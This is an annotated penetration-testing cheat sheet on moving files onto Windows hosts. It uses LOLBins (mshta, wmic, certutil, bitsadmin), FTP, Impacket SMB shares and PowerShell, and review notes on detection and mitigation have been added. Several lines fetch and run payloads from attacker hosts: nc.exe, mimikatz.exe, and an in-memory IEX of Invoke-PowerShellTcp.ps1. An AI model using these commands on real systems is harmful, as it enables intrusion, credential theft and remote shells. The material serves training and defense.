File Transfer Methods
# Downloads through built-in, Microsoft-signed Windows binaries (LOLBins).
# Detection: process-creation logging with full command lines (Security 4688
# with command-line auditing, or Sysmon Event ID 1) records each of these; a
# URL in the arguments of mshta, wmic, certutil or bitsadmin is a strong signal.
# Mitigation: application-control rules (WDAC/AppLocker) for these binaries and
# egress filtering so hosts cannot fetch from arbitrary web servers.
# NOTE(review): the quotes on the mshta and wmic lines are typographic (“ ”),
# most likely a page-rendering artifact; the wmic line also lacks a closing quote.
# mshta (ATT&CK T1218.005) - only the argument is shown, not the mshta call itself
vbscript:Close(Execute(“GetObject(“”script:http://webserver/payload.sct””)”))
# wmic (ATT&CK T1220, XSL script processing) - remote stylesheet via /format
wmic os get /format:”https://webserver/payload.xsl
# certutil (ATT&CK T1105) - a -urlcache fetch also leaves a copy in the user's
# CryptnetUrlCache directory, which is a useful forensic artifact
certutil -urlcache -split -f http://webserver/payload
# bitsadmin (ATT&CK T1197) - BITS jobs are recorded in the
# Microsoft-Windows-Bits-Client/Operational event log
# NOTE(review): /transfer normally takes a local destination file after the
# URL; none is given on this line.
bitsadmin /rawreturn /transfer getpayload http://IP/nc.exe
# Using FTP
# FTP is cleartext: credentials and file contents are visible to network
# monitoring, and ftp.exe opening outbound connections from a workstation or
# server is easy to alert on in process and network telemetry.
# On the Linux Box:
# Started this way, pyftpdlib serves the current directory and, with no user
# configured, accepts anonymous logins, so any host that reaches the port can read it.
python3 -m pyftpdlib -p {port number}
# On the Windows Box:
C:\Windows\System32\ftp.exe {ip address}
# Using SMB from Impacket
# First line is the usage form, second a concrete example. No credentials are
# set, so the share is open to any host that can reach it.
python /opt/impacket/build/scripts-2.7/smbserver.py {SHARENAME} {PATH}
python /opt/impacket/build/scripts-2.7/smbserver.py SQUID /root/HTB/www
# On the Windows Box:
# Defender notes: a client that connects to an SMB server it does not control
# sends NTLM authentication material to that server. Blocking outbound TCP 445
# at the perimeter stops both this transfer path and that exposure. Several
# recent Windows editions also refuse unauthenticated guest SMB access by default.
net view \\{attacker IP}
Example: net view \\10.11.0.47
# Commands to use are: {dir} {copy} {move} etc...
Example: copy \\10.11.0.47\SQUID\mimikatz.exe .
# Using powershell
# DownloadString + IEX runs the fetched script in memory without writing a file.
# Detection: PowerShell Script Block Logging (Event ID 4104) records the
# downloaded script content, and AMSI exposes it to the AV engine before it runs.
# The URL is plain http, so the transfer has no integrity or confidentiality protection.
powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1')"
# Invoke Web request
# IWR is the built-in alias for Invoke-WebRequest; with -outfile the download is
# written to disk, where on-access AV scanning and file-creation telemetry
# (e.g. Sysmon Event ID 11) apply.
IWR -uri http://10.10.14.15/file.exe -outfile file.exe
# Step 1 - Start smbserver from Kali
# Shares the current directory as "myshare" and requires the given username and
# password. The password is passed on the command line, so it ends up in shell
# history and the process list; "test123" is a sample value.
impacket-smbserver myshare $(pwd) -username admin -password "test123"
# Step 2 on the target machine
# Builds a PSCredential from the same username/password and maps the share as a
# PSDrive. The plaintext password appears in PowerShell history and, where
# enabled, in script block logs (Event ID 4104).
$pass = "test123" | ConvertTo-SecureString -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('admin', $pass)
# NOTE(review): -name is the local drive name; the share is the last component
# of -root. The root below ends in \stuff, which does not match the "myshare"
# share started in step 1 - one of the two is presumably a leftover.
New-PSDrive -name myshare -root \\10.10.14.12\stuff -Credential $cred -PSProvider "FileSystem"
# Details:
# myshare is the name of the share you created on step 1
# Then:
# "myshare:" here is the PSDrive name given with -name above
cd myshare:
# And check the files